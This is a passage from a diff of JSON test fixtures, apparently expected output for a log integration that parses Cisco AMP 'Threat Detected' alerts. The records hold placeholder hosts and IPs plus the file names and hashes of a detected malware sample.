+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":287000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251512150196000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251512150196248",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:38.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581742294Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":256000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196247\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251512150196000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251512150196247",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:38.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581744207Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196246\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251512150196000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251512150196246",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:38.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581746351Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196245\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251512150196000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251512150196245",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:38.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581748237Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":209000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196244\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251512150196000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251512150196244",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:38.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581750120Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196243\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251512150196000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251512150196243",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:38.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581752005Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":147000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196242\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251512150196000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251512150196242",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:38.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581753905Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196241\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251512150196000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251512150196241",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:38.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
